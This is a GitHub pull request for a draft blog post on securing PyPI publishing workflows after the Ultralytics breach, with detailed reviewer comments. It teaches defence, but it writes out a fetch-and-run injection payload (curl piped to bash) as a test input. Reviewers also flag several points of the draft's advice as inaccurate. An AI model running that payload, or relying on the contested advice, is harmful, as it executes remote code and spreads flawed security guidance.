-
Notifications
You must be signed in to change notification settings - Fork 60
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
feat(blog): blog post--lessons learned on publish security #538
base: main
Are you sure you want to change the base?
Changes from 5 commits
b236a94
fb6318f
d85f1a2
572e705
6a1fd45
029bd04
e16facb
4a80188
7cf3279
1bd173c
a285a13
b9b8d3e
d6630bc
3215e26
21bb0cf
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
Original file line number | Diff line number | Diff line change | ||||
---|---|---|---|---|---|---|
@@ -0,0 +1,307 @@ | ||||||
--- | ||||||
layout: single | ||||||
title: "How to Secure Your Python Packages on PyPI: Stop the Mining Madness" | ||||||
excerpt: "Learn how to secure your Python package PyPI publishing workflows and protect your package from attacks. This post covers actionable steps, using PyPI Trusted Publisher, and sanitizing workflows, to ensure your projects stay safe." | ||||||
author: "Leah Wasser" | ||||||
permalink: /blog/python-packaging-security-publish-pypi.html | ||||||
header: | ||||||
overlay_image: images/headers/pyopensci-inessa.png | ||||||
overlay_filter: rgba(20, 13, 36, 0.3) | ||||||
categories: | ||||||
- blog-post | ||||||
- community | ||||||
classes: wide | ||||||
toc: true | ||||||
comments: true | ||||||
last_modified: 2024-12-13 | ||||||
--- | ||||||
|
||||||
## Is your PyPI publication workflow secure? | ||||||
|
||||||
The recent Python package breach [involving Ultralytics](https://blog.pypi.org/posts/2024-12-11-ultralytics-attack-analysis/) has highlighted the need for secure PyPI publishing workflows. Hackers exploited a GitHub workflow (`pull_request_target`) to inject malicious code, which was published to PyPI. Users who downloaded the package unknowingly allowed their machines to be hijacked for Bitcoin mining. | ||||||
|
||||||
> Hackers tricked a Python package into running bad code, using other people’s computers to mine Bitcoin without permission. Yikes! | ||||||
|
||||||
While unsettling, there’s a silver lining: the PyPI security team had already addressed most of the issues that caused this breach. | ||||||
|
||||||
|
||||||
{% include pyos-blockquote.html quote="Because the Ultralytics project was using Trusted Publishing and the PyPA’s publishing GitHub Action: PyPI staff, volunteers, and security researchers were able to dig into how maliciously injected software was able to make its way into the package." author="Seth Larson, PSF Security Expert" class="highlight magenta" %} | ||||||
|
||||||
This incident underscores the importance of understanding Python packaging security best practices. | ||||||
|
||||||
In this blog post, we'll cover the lessons learned that you can apply - TODAY - to your own Python packaging workflows! | ||||||
|
||||||
<div class="notice" markdown="1"> | ||||||
## TL&DR Takeaways | ||||||
|
||||||
The Ultralytics breach is a wake-up call for all maintainers: secure your workflows now to protect your users and the Python ecosystem. Start with these key actions: | ||||||
|
||||||
### 🔐 Secure your workflows 🔐 | ||||||
- 🚫 Avoid risky events like `pull_request_target` and adopt release-based workflows. | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. It's not immediately clear what makes a workflow “release-based”. I haven't read past this point at the time of writing this comment, though. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. good point - fixed!!
|
||||||
- ♻️ Don’t cache dependencies in your publish workflows to prevent tampering. | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. That's probably an oversimplification. Not caching the deps may as well lead to something like this if the transitive deps are unpinned and get updated in uncontrolled manner. The problem was that the cache was poisoned in a job with a security context that had high privileges and then, another job picked it up, effectively reusing what that first one “pinned” in the installed deps. But if there's no cache, a compromised transitive dependency can be downloaded from PyPI, resulting in the same problem. Security exists in context and not in isolation. It should come from a place of understanding how different bits fit together. That said, I wouldn't make a call of whether using caching or not will save us all. The problem was that it was possible to compromise the cache that ended up being used. I think it's possible to use cache securely by having separate cache keys unique to the dist building job. So caches for building the dists and testing them would not leak into each other. That's the real fix for cache. Another side of this is the supply chain problem, which cache ended up being a part of in this instance. But as I mentioned earlier, the supply chain could be compromised differently, without cache being a factor. The solution to this is pinning your dependencies. This means recording every single version number for every single transitive dependency there is. One of the low-level tools to use for this is To summarize, the solution here is to be in control of your deps, make sure their updates are transparent and controllable on all the levels, and to know what influences them… Out of the context, disallowing caching is a band-aid at best. But it may be harmful in that it would cultivate a false sense of security. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. ok. This is super helpful. I could remove the caching part altogether, given so many moving pieces and caching seems more nuanced then just locking down the workflow itself with better triggers and tighter permissions. But I also have a question about the dependencies. Because it is my understanding and experience that pinning all deps can also be highly problematic for users. For instance, if you have an environment with many different packages and try installing a package with pinned dips, that could lead to significant user issues. Unless we're just talking about dips in the workflow itself, such as hatch, pypa/build, etc. web apps make sense to pin but i can't quite wrap my head around pinning deps for a package. Could you please help me understand? And do you agree - maybe for more beginner users we just drop caching altogether as a topic? |
||||||
- If you reference branches in a pull request, clean or sanitize branch names in your workflow. | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Perhaps, link https://docs.github.com/en/get-started/using-git/dealing-with-special-characters-in-branch-and-tag-names and recommend that people use https://woodruffw.github.io/zizmor/. And maybe https://securitylab.github.com/resources/github-actions-untrusted-input/. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Great suggestions!! I may add these links lower down in the post at the end, so the takeaways are just text.. but I'll definitely include them. This is what I have now:
i haven't used zizmor yet but i saw a package that Hugo maintains uses it so i may try it out with stravalib and pyosmeta!! |
||||||
|
||||||
### Lock down GitHub repo access | ||||||
- 🔒 Restrict repository access to essential maintainers only. | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. While the principle of the least privilege is good to follow, this specific breach wasn't because somebody had direct access to the repo (the attack wouldn't need to be as sophisticated), but because the security context used for PRs from arbitrary forks was set to trusted w/o performing the necessary precautions. |
||||||
- ✅ Add automated checks to ensure releases are authorized and secure. | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I think this is mostly about setting an environment in the job and making sure that environment has required reviewers in the repo settings. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Looking at the blog posts, it seemed like the hackers somehow got direct access to that repo. Did i read that wrong? |
||||||
|
||||||
### Strengthen PyPI security | ||||||
- 🔑 Set up Trusted Publisher for tokenless authentication with PyPI. | ||||||
lwasser marked this conversation as resolved.
Show resolved
Hide resolved
|
||||||
- 📱 Enable 2FA for your PyPI account and store recovery codes securely. | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. 2FA is already required for any uploads to PyPI since this year. There's no way around anymore. That said, long-living and over-scoped API keys may leak and should be rotated periodically. It's much easier to use Trusted Publishing instead — it uses short-lived tokens every time, they expire in 15 minutes upon creation and one doesn't need to do a thing to revoke them. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Ok, I hear you. I've added this:
I'll likely remove 2FA altogether, given it's required. I doubt most users understand why making tokens infinitely valid is bad! |
||||||
|
||||||
These steps will significantly reduce risks to your packages, contributors, and the broader Python ecosystem. Don’t wait—start securing your workflows today. | ||||||
lwasser marked this conversation as resolved.
Show resolved
Hide resolved
|
||||||
</div> | ||||||
|
||||||
|
||||||
## A call to action if you are publishing to PyPI using GitHub actions | ||||||
|
||||||
What's important for us is that this event highlights the need for our ecosystem to follow and understand secure PyPI publishing practices and carefully monitor workflows. And the good news here is that if you are already publishing to PyPI using a GitHub action, there are things you can do RIGHT NOW to ensure your build is more secure. | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more.
Suggested change
You meant There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. here, I'm referring to GitHub actions in general but our examples do use the pypa action . But you are making a good point. i'll come back to this comment and will make sure that point is super clear in the text. |
||||||
|
||||||
For this post, we will use [this workflow that pyOpenSci has setup](https://github.com/pyOpenSci/pyosMeta/blob/main/.github/workflows/publish-pypi.yml) that was reviewed and developed by both a PyPI maintainer and also several core pyOpenSci community members that have significant knowledge about best practices in publishing to PyPI. | ||||||
|
||||||
Below are actionable steps you can take to enhance security when publishing Python packages to PyPI using GitHub actions. | ||||||
|
||||||
|
||||||
## 1. Avoid `pull_request_target` and consider release-based workflows | ||||||
|
||||||
The [`pull_request_target`](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target) event in GitHub Actions that Ultralytics used, allows workflows to run with elevated permissions on the base branch, even when triggered by changes from a fork. Thus, when used as a trigger to push a release to PyPI, your workflow becomes vulnerable. | ||||||
|
||||||
Instead, consider adopting a **release-based workflow**: | ||||||
|
||||||
- Trigger publication workflows only on versioned releases. | ||||||
- Ensure workflows related to publishing are explicitly scoped to `release` events or tagged commits. | ||||||
|
||||||
Notice in our workflow below that we use a `release` trigger to avoid these risks. While we also have a `push` trigger, it never triggers a publication to PyPI. | ||||||
|
||||||
|
||||||
```yaml | ||||||
name: Publish to PyPI | ||||||
on: | ||||||
# By using release - only people with admin access to make releases to our repo can trigger the push to PyPI | ||||||
release: | ||||||
types: [published] | ||||||
push: | ||||||
branches: | ||||||
- main | ||||||
``` | ||||||
|
||||||
In the example above, the push trigger is only used to test that the package distribution files can be built. To ensure that a package is only ever published on a release, we include a conditional in the publish-to-PyPI step: | ||||||
|
||||||
```yaml | ||||||
- name: Publish package to PyPI | ||||||
# Only publish to real PyPI on release | ||||||
if: github.event_name == 'release' | ||||||
``` | ||||||
|
||||||
This approach ensures that the publishing step is tightly controlled, reducing the risk of malicious activity in your workflow. | ||||||
|
||||||
## 2. Don’t cache package dependencies in your publish step | ||||||
|
||||||
Caching dependencies involves storing them to be reused in future workflow runs. This approach saves time, as GitHub doesn’t need to redownload all dependencies each time the workflow runs. | ||||||
|
||||||
TODO: create graphic about reusing dependencies | ||||||
|
||||||
However, caching dependencies can allow attackers to manipulate cached artifacts, such as dependencies. If this happens, the workflow may pull in compromised versions from the cache during the next run. | ||||||
|
||||||
**Takeaway:** Don’t cache dependencies in your Python package publishing workflow. Always download fresh dependencies to ensure you’re using the latest secure versions of any packages your project depends on. | ||||||
|
||||||
Below is an example of a build that caches dependencies. | ||||||
|
||||||
```yaml | ||||||
name: Build and Test | ||||||
|
||||||
on: | ||||||
push: | ||||||
branches: | ||||||
- main | ||||||
pull_request: | ||||||
|
||||||
jobs: | ||||||
build: | ||||||
runs-on: ubuntu-latest | ||||||
|
||||||
steps: | ||||||
# Step 1: Check out the repository | ||||||
- name: Check out repository | ||||||
uses: actions/checkout@v3 | ||||||
|
||||||
# Step 2: Set up Python | ||||||
- name: Set up Python | ||||||
uses: actions/setup-python@v4 | ||||||
with: | ||||||
python-version: '3.12' | ||||||
|
||||||
# Step 3: Cache dependencies | ||||||
- name: Cache dependencies | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. This is not tested and could be wrong. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. This is one of the uses but oftentimes, building is performed by There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. oh, right, good point. What is a good example of caching dependencies (other than what we say with ultranalytics)? I use caching when i'm publishing. we pip install hatch and use What do you think about removing the example and just telling people that if they do cache dependencies for any reason, don't do it when the build is for publishing? for instance, doing it for a website build could be ok if it's a preview, etc. vs publishing a package? |
||||||
uses: actions/cache@v3 | ||||||
with: | ||||||
path: ~/.cache/pip | ||||||
key: ${{ runner.os }}-pip-${{ hashFiles('**/requirements.txt') }} | ||||||
restore-keys: | | ||||||
${{ runner.os }}-pip- | ||||||
|
||||||
# Step 4: Install dependencies | ||||||
- name: Install dependencies | ||||||
run: pip install -r requirements.txt | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. This example shows installing some abstract deps but does not demonstrate using them (as in, running |
||||||
|
||||||
# Step 5: Publish to PyPI | ||||||
... | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. NEVER EVER build in the same job as publishing. This is an insecure practice. I had to recently spell it out @ https://github.com/marketplace/actions/pypi-publish#Non-goals. One of the reasons (probably the most important one in the context of this document) is that Trusted Publishing requires one to increase privileges of the publishing job, giving it access to OIDC. This privilege must not be shared with transitive build dependencies. Such a privilege escalation may allow a malicious actor to impersonate your workflow in systems beyond PyPI (but also increases the poisoning surface for the dists published on PyPI). Ultimately, the only workflow shape I'm willing to call supported is documented @ https://packaging.python.org/en/latest/guides/publishing-package-distribution-releases-using-github-actions-ci-cd-workflows/. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. i will add a link to that packaging guide. And i see why this example may direct users incorrectly. in fact, i remember you telling me this last year when we were working on pyosMeta to update that build! |
||||||
``` | ||||||
|
||||||
## 4. Use Trusted Publisher for PyPI | ||||||
|
||||||
If you only [publish locally to PyPI using the command line](https://www.pyopensci.org/python-package-guide/tutorials/publish-pypi.html), you need to use a PyPI token. However, if you’re using GitHub Actions to automate your publishing process, setting up **Trusted Publisher** is a more secure option. | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. IIRC @woodruffw was against claiming that TP is more secure, so we settled on saying that it's “as secure” but is more convenient in many regards in the README of There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. oh. that's different from my understanding of trusted publishing. I thought that TP provides a secure "pipeline" between the workflow and PyPI vs. a token that I suppose provides access to PyPi, but it doesn't necessarily directly connect to the workflow (i.e., you can specify a specific environment and workflow file with a trusted publisher. This statement challenges my understanding of trusted publisher. @woodruffw IF you happen to have a moment to clarify that would be super helpful. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. TP is more secure in that the tokens are short-lived compared to perpetual API tokens. And it seems like the hackers got hold of forgotten API tokens in the repo to be able to make the second pair of releases in this case. |
||||||
|
||||||
A Trusted Publisher setup creates a secure "pipeline" between PyPI and your GitHub repository because: | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Personally, I like calling it a “trust link”. Perhaps, @woodruffw would have opinions on the wordings/metaphors here. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I like the pipe idea as it's a visual people can understand even if it's not perfect. An isolated pipe or channel where files (sdist, wheel) can "travel" and be verified between GitHub and PyPI. 🤷🏻♀️ maybe there is a better visual but i want to help people understand why this is a good way to design a build / publish workflow. I want to create a graphic to help people understand this, as I think some of these important concepts get lost because it's all so technical! But i say that knowing that you and others are experts - i'm just trying to simplify so more people can apply some of these things! |
||||||
- PyPI is allowed to authenticate your builds directly, so no additional configuration is required. | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Not builds, but uploads. We make “publish” attestations, as the action cannot know how the dist it sends over was actually built. It should be built in a separate job. But theoretically could be built elsewhere and downloaded from S3 or wherever. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Fixed! |
||||||
- It restricts publishing to specific workflows and environments defined in your repository. | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Technically, the environment is attached to a job in a workflow. This is the information PyPI would receive when looking up the trust link. Environments, however, can also be additionally configured in repository settings on GitHub. The recommended environment name is There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. @webknjaz I have not set this up myself and just noticed this feature after reading your comment. thank you. I really don't think people know about this stuff. TODO: I'll add a small note about how to do that in the post with a screenshot of what the interface looks like. |
||||||
|
||||||
This setup eliminates the need to store sensitive tokens as GitHub secrets, significantly reducing the risk of token theft or unauthorized publication. | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I don't fully agree with that note on unauthorized publication. Unauthorized publication can be prevented by controlling the trigger of the release process. Or setting up required reviewers in the environment used in the publishing job (usually called There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. ok, I am still working through your comments, but after I plan to reread the entire thing, and i'll reframe it. concepts:
People will forget the step of updating their token to be project-level scope. So a trusted publisher, in my mind, is less risky for a user because it's simpler.
maybe there is a graphic here to simplify and help people understand what you wrote above? gh + human authorization These are two different but related and important concepts. And they are high-level. like if people need to remember 2 things - these are the things. |
||||||
|
||||||
### How to get started | ||||||
|
||||||
[PyPI provides a great guide to getting started with Trusted Publisher](https://docs.pypi.org/trusted-publishers/adding-a-publisher/). | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. cc @woodruffw apparently we forgot to update the screenshots in the warehouse doc to show There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Oops! I can open an issue if that is helpful in warehouse? |
||||||
|
||||||
The basic steps associated with Trusted Publisher are: | ||||||
1. Go to your PyPI account and add a trusted publisher workflow to your account. | ||||||
2. Fill out a form that looks like the one below. Notice that it asks for your workflow name, (optional) environment, and package name. | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Maybe, don't mention that the environment is optional if this post is focused on maximizing security. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. good point!! changed to (they will see optional in the image!) environment (STRONGLY recommended) |
||||||
3. Update your GitHub action workflow to reference the Trusted Publisher configuration. | ||||||
lwasser marked this conversation as resolved.
Show resolved
Hide resolved
|
||||||
|
||||||
<figure> | ||||||
<picture> | ||||||
<source srcset="/images/python-packaging/trusted-publisher-form.webp" type="image/webp"> | ||||||
<img src="trusted-publisher-form.webp" alt="PyPI Trusted Publisher form example showing settings for linking a GitHub repository with PyPI for secure publishing." loading="lazy"> | ||||||
</picture> | ||||||
<figcaption> | ||||||
Example of the PyPI Trusted Publisher form, used to securely link a GitHub repository with PyPI for publishing Python packages. Trusted Publisher reduces the risk of token theft and improves overall security. | ||||||
</figcaption> | ||||||
</figure> | ||||||
|
||||||
You can see how to set up GitHub Actions securely in our own [PyPI publishing GitHub workflow](https://github.com/pyOpenSci/pyosMeta/blob/main/.github/workflows/publish-pypi.yml), which follows the Trusted Publisher approach. | ||||||
|
||||||
**Note:** Trusted Publisher workflows are currently only available for GitHub. Support for GitLab may be coming in the future—stay tuned! | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. In the doc you already linked, there's an example for GitLab as well: https://docs.pypi.org/trusted-publishers/adding-a-publisher/#gitlab-cicd. There are 4 platforms that support this mechanism already, and I saw some Bitbucket folks asking around whether they can integrate. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. fixed the breakout and added that link!! I somehow read that GitLab support wasn't available yet, but obviously, I wasn't looking in the right place! thanks! |
||||||
{: .notice } | ||||||
|
||||||
## 5. Create a dedicated environment for publish actions | ||||||
|
||||||
Use isolated environments in combination with Trusted Publisher in your GitHub workflow to publish to PyPI. | ||||||
Isolated environments ensure your publishing process remains secure even if other parts of your CI pipeline are compromised. | ||||||
|
||||||
If you look at the pyometra workflow, notice that we have an [environment called `pypi`](https://github.com/pyOpenSci/pyosMeta/blob/main/.github/workflows/publish-pypi.yml#L57) that is used for trusted publishing. By setting this up, we have created a direct pipeline between this action and PyPI via the PyPI environment and the trusted publisher setup, which refers to the workflow file's name. | ||||||
lwasser marked this conversation as resolved.
Show resolved
Hide resolved
|
||||||
|
||||||
```yaml | ||||||
publish: | ||||||
name: >- | ||||||
Publish Python 🐍 distribution 📦 to PyPI | ||||||
if: github.repository_owner == 'pyopensci' | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I started using the exact repository ID some time ago. This is more accurate and would survive renames and transfers:
Suggested change
(looked up @ https://api.github.com/repos/pyOpenSci/pyopensci.github.io) If you want to check for the org, you could use the org ID. Org names are mutable and if the org gets renamed for whatever reason (might be a user account that hosts a repo in some cases), this check would break. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. oh wow - I've always used the username as the conditional value. The only challenging piece here for users is they'd have to use the API to get that repo id value. I don't see a clear way to get it from the GitHub GUI. we could make a note about an owner name being mutable however and provide the command to find the ID (it requires a token i think?). There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I'd just stick with the org/username, it's much more readable and transparent. Org renames/transfers are pretty rare. And you'd notice the problem right away after the first deploy and it's an easy fix. |
||||||
needs: | ||||||
- build | ||||||
runs-on: ubuntu-latest | ||||||
environment: | ||||||
name: pypi | ||||||
url: https://pypi.org/p/pyosmeta | ||||||
``` | ||||||
|
||||||
## 6. Sanitize a branch name in your workflow, before calling it! | ||||||
|
||||||
One of the critical issues in the Ultralytics breach was that attackers crafted a [**malicious branch name containing a shell script**](https://github.com/ultralytics/ultralytics/pull/18020) 🤯. This script executed within the GitHub Action workflow because the branch name was directly referenced using `github.ref`. | ||||||
|
||||||
When `github.ref` is used without sanitization, malicious content embedded in branch names can be executed. This is known as a **template injection**: | ||||||
|
||||||
{% include pyos-blockquote.html quote="...is a classic GitHub Actions template injection: the expansion of `github.head_ref || github.ref` is injected directly into the shell’s context, with no quoting or interpolation.." author="https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-injection" class="highlight magenta" %} | ||||||
|
||||||
Because the branch name wasn’t sanitized, it was treated as a shell command and executed with full permissions. Yikes! | ||||||
|
||||||
|
||||||
### Problem: a GitHub action that calls 'ref' to the workflow that could be manipulated | ||||||
|
||||||
Below is an example of a potentially vulnerable packaging workflow. If the branch name contains malicious content, this workflow could execute harmful commands: | ||||||
|
||||||
```yaml | ||||||
jobs: | ||||||
example-job: | ||||||
runs-on: ubuntu-latest | ||||||
steps: | ||||||
- name: Run a script | ||||||
run: | | ||||||
echo "Running script for branch: $GITHUB_REF" | ||||||
``` | ||||||
|
||||||
### Solution: Sanitize the Branch Name | ||||||
|
||||||
To fix this, sanitize or clean the branch name before using it in your workflows. A small Bash cleanup step removes unexpected or unsafe characters. | ||||||
|
||||||
``` | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more.
Suggested change
|
||||||
jobs: | ||||||
example-job: | ||||||
runs-on: ubuntu-latest | ||||||
steps: | ||||||
- name: Sanitize branch name | ||||||
run: | | ||||||
SAFE_BRANCH=$(echo $GITHUB_REF | sed 's/[^a-zA-Z0-9_\-\/]//g') | ||||||
echo "Sanitized branch name: $SAFE_BRANCH" | ||||||
echo "Running script for branch: $SAFE_BRANCH" | ||||||
``` | ||||||
|
||||||
<div class="notice" markdown="1"> | ||||||
How cleaning the branch name works: | ||||||
|
||||||
1. echo $GITHUB_REF: Outputs the branch name. | ||||||
2. sed 's/[^a-zA-Z0-9_\-\/]//g': Removes any characters that are not letters, numbers, dashes, underscores, or slashes, ensuring the branch name is safe. | ||||||
|
||||||
Try It: | ||||||
|
||||||
Test how sanitization works by running this command in your shell: | ||||||
the branch name: $({curl,-sSfL,raw.githubusercontent.com/test/test/123456d8daa0b26ae0c221aa4a8c20834c4dbfef2a9a14/dummyfile.sh} | bash) | ||||||
|
||||||
|
||||||
```bash | ||||||
# Input string | ||||||
input='$({curl,-sSfL,raw.githubusercontent.com/test/test/123456d8daa0b26ae0c221aa4a8c20834c4dbfef2a9a14/dummyfile.sh} | bash)' | ||||||
|
||||||
# Sanitization step | ||||||
sanitized=$(echo "$input" | sed 's/[\$\{\}\|\(\)]//g') | ||||||
|
||||||
# Output the sanitized string | ||||||
echo "Original: $input" | ||||||
echo "Sanitized: $sanitized" | ||||||
``` | ||||||
|
||||||
This strips out any characters that can be used to call shell commands. | ||||||
|
||||||
</div> | ||||||
|
||||||
The good news here is that if you use a release-based workflow as discussed earlier, then you don't have to worry about branch names. And yes you can always make a release from a different branch! | ||||||
|
||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Add: a few sentences on delete old tokens and secrets containing pypi tokens... this is easy for people to do and good for them to know about. |
||||||
Restricting publish workflows to tagged releases significantly reduces the risk of such attacks. | ||||||
|
||||||
|
||||||
## GitHub & PyPI security tips | ||||||
|
||||||
In addition to securing your workflows, lock down your accounts and repositories: | ||||||
|
||||||
- **Enable 2FA (2-factor authentication)** for both PyPI and GitHub to prevent unauthorized access. Store recovery codes securely (e.g., in a password manager). | ||||||
- **Revoke old tokens**: If you've previously created PyPI API tokens or GitHub secrets, delete any unused or outdated ones. | ||||||
- **Restrict repository access**: Limit write access to a trusted subset of maintainers. Most contributors don’t need direct write access, which reduces security risks. | ||||||
|
||||||
## Learn More | ||||||
|
||||||
pyOpenSci follows best practices for PyPI publishing using our custom GitHub Actions workflow. Check out our tutorial on Python packaging here: | ||||||
👉 [pyOpenSci Packaging Tutorial](https://www.pyopensci.org/python-package-guide/package-structure-code/python-package-structure.html) | ||||||
👉 Join our discourse here | ||||||
|
||||||
<div class="notice" markdown="1"> | ||||||
## Get involved with pyOpenSci | ||||||
|
||||||
* Keep an eye on our [events page](/events.html) for upcoming training events. | ||||||
|
||||||
Follow us on social platforms: | ||||||
|
||||||
* [<i class="fa-brands fa-discourse"></i> Discourse](https://pyopensci.discourse.group/) | ||||||
* [<i class="fa-brands fa-mastodon"></i> Mastodon](https://fosstodon.org/@pyopensci) | ||||||
* [<i class="fa-solid fa-cloud"></i> Bluesky](https://bsky.app/profile/pyopensci.bsky.social) | ||||||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Tip Pro tip: consider updating the Bluesky username to There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. WOAH!! i never knew about this for bluesky!. |
||||||
* [<i class="fa-brands fa-linkedin"></i> LinkedIn](https://www.linkedin.com/company/pyopensci) | ||||||
* [<i class="fa-brands fa-github"></i> GitHub](https://github.com/pyOpenSci) | ||||||
|
||||||
If you are on LinkedIn, you should [subscribe to our newsletter, too](https://www.linkedin.com/newsletters/7179551305344933888/?displayConfirmation=true). | ||||||
</div> |
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Please, replace this screenshot with one having |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
pull_request_target
is not a workflow, it's one of the events that may trigger a workflow run. A workflow may “subscribe” to different events likepush
andpull_request
, this is just another event type with elevated privileges in its security context.Not only that, but they also did that in Google Colab which got their accounts banned pretty swiftly...
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
OOOOH no way. i missed the Google Colab part!! that's a pretty bold move for a hacker? maybe they were new hackers ?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
See googlecolab/colabtools#4979.
It was unwitting end users who installed the hacked package on their Colab accounts, and the Google automation then suspended their accounts:
Google was pretty quick in restoring accounts, but it happened to a lot of accounts: googlecolab/colabtools#4979 (comment)